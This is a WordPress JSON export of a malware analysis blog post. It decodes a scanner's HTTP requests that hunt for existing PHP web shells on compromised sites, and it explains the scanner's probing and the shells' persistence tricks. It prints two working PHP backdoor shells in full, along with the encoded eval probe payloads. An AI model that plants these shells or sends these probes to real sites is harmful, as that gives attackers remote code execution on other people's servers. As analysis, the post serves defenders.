{"id":29,"date":"2023-11-26T00:15:27","date_gmt":"2023-11-26T00:15:27","guid":{"rendered":"https:\/\/ticklemeelmo.com\/malware\/?p=29"},"modified":"2023-11-26T00:26:50","modified_gmt":"2023-11-26T00:26:50","slug":"malware-scanner-spreader-targeting-php-shells","status":"publish","type":"post","link":"https:\/\/syschan.org\/malware\/malware-scanner-spreader-targeting-php-shells\/","title":{"rendered":"Malware Scanner\/Spreader Targeting PHP Shells"},"content":{"rendered":"\n

A while back an abuse complaint was forwarded to me by someone requesting information about the HTTP requests contained in the complaint. Below is a select sample of the values from the requests outlined in the complaint:<\/p>\n\n\n\n

<\/p>\n\n\n\n

[codez] => echo%2520%2528123454320%252B1%2529%253Bexit%2528%2529%253B\n[z0] => ZXZhbCgnZWNobyAoMTIzNDU0MzIwKzEpO2V4aXQoKTsnKTs\n[fuckyou4321] => eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));\n[fukq] => t<\/pre>\n\n\n\n
So what\u2019s it doing? Let\u2019s start by analyzing the above strings:<\/p>\n\n\n\n
    \n
  1. z0<\/li>\n<\/ol>\n\n\n\n
    <\/p>\n\n\n\n
    [z0] => ZXZhbCgnZWNobyAoMTIzNDU0MzIwKzEpO2V4aXQoKTsnKTs<\/pre>\n\n\n\n
    This string is base64 encoded, and decodes to:<\/p>\n\n\n\n
    <\/p>\n\n\n\n
    eval('echo (123454320+1);exit();');<\/pre>\n\n\n\n
      \n
    1. codez<\/li>\n<\/ol>\n\n\n\n
      <\/p>\n\n\n\n
      [codez] => echo%2520%2528123454320%252B1%2529%253Bexit%2528%2529%253B<\/pre>\n\n\n\n
      This line has been run through PHP\u2019s urlencode(); function twice. Decoded, it is:<\/p>\n\n\n\n
      <\/p>\n\n\n\n
      echo (123454320+1);exit();<\/pre>\n\n\n\n
        \n
      1. fuckyou4321<\/li>\n<\/ol>\n\n\n\n
        <\/p>\n\n\n\n
        [fuckyou4321] => eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));<\/pre>\n\n\n\n
        This decodes and executes the PHP code from the above \u201ccodez\u201d portion of the request. Decoded, it looks like:<\/p>\n\n\n\n
        <\/p>\n\n\n\n
        eval(urldecode(urldecode($_POST[codez])));<\/pre>\n\n\n\n
          \n
        1. fukq [fukq] => t<\/code>
          This one isn\u2019t encoded, but is important.<\/li>\n<\/ol>\n\n\n\n
          Okay, so what are these requests all about?<\/p>\n\n\n\n
          As luck would have it, I had two malware samples archived from previous investigations, both of them PHP shells, which I recognized as being related to these requests.<\/p>\n\n\n\n
          Shell 1:<\/p>\n\n\n\n
          <\/p>\n\n\n\n
          <?php eval(base64_decode($_REQUEST['z0'])); ?><\/pre>\n\n\n\n
          Functionally, it executes base64 encoded PHP code supplied to it via POST or GET in the \u201cz0\u201d parameter. Look familiar?<\/p>\n\n\n\n
          I have found this particular web shell added to PHP files necessary for the operation of site functions during previous investigations. Prepending this code to existing, writable PHP files causes malware scans which quarantine instances of this code to render the infected site non-functional. This appears to be a persistence method, done in an effort to increase the chance the quarantined file being removed from quarantine in order to get the site back online, making the backdoor re-accessible to the attacker. In numerous cases I have seen this shell \u201ccrypted\u201d using a variety of methods, in an apparent effort to avoid detection by signature-based anti-malware software.<\/p>\n\n\n\n
          Shell 2:<\/p>\n\n\n\n
          <\/p>\n\n\n\n
          <?php\n$fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}\necho apiRequest();\nfunction apiRequest(){\n\tif(@$_GET['op'] == 'check')\n\t\t{\n\t\t return \"connectjbmoveisok\";\n\t\t exit();\n\t    }\n}\n?><\/pre>\n\n\n\n
          This is another web shell, which executes PHP code passed to it via POST parameter \u201cfuckyou4321\u201d and then displays the result. The PHP code passed to the shell only executes, however, if the GET parameter \u201cfukq\u201d contains the value \u201ct\u201d \u2013 this appears to be an attempt at basic authentication by the author of the shell, but as we will see, it is not very effective against someone who has seen the code.<\/p>\n\n\n\n
          So if you haven\u2019t caught on yet, this is what\u2019s happening\u2026<\/p>\n\n\n\n
          The requests in the provided abuse complaint all attempt to execute PHP code through a number of different web shells commonly hidden in infected site files.<\/p>\n\n\n\n
          The scanner accomplishes this by making requests to files associated with commonly exploited CMS, plugins, and themes where this shell code might be expected to be found.<\/p>\n\n\n\n
          These requests conform the expected operation (GET\/POST parameter names, encoding types, check values) of the web shells the attacker is attempting to locate.<\/p>\n\n\n\n
          If one of these requests returns a response containing \u201c123454321\u201d (the result of the PHP code \u201cecho (123454320+1);\u201d being executed) the attacker has located a web shell, and confirmed their ability to remotely execute PHP through it, allowing them to further exploit the server.<\/p>\n\n\n\n
          Final Thoughts:<\/p>\n\n\n\n
          It is unclear at this time if the shells being targeted by this scanner are related to botnets which have been orphaned by c2 takedowns or similar circumstances, or if they are part of currently active botnets which are being exploited and abused by an additional malicious actor or actors.<\/p>\n\n\n\n
          I found this spreader\u2019s method of exploiting common web shells particularly interesting, as in my experience it is rather uncommon compared to more \u201ctraditional\u201d methods such as automating the exploitation of vulnerabilities present in legitimate web applications.<\/p>\n","protected":false},"excerpt":{"rendered":"
          A while back an abuse complaint was forwarded to me by someone requesting information about the HTTP requests contained in the complaint. Below is a select sample of the values from the requests outlined in the complaint: So what\u2019s it doing? Let\u2019s start by analyzing the above strings: This string is base64 encoded, and decodes […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-29","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/29","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/comments?post=29"}],"version-history":[{"count":9,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/29\/revisions"}],"predecessor-version":[{"id":81,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/29\/revisions\/81"}],"wp:attachment":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/media?parent=29"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/categories?post=29"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/tags?post=29"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}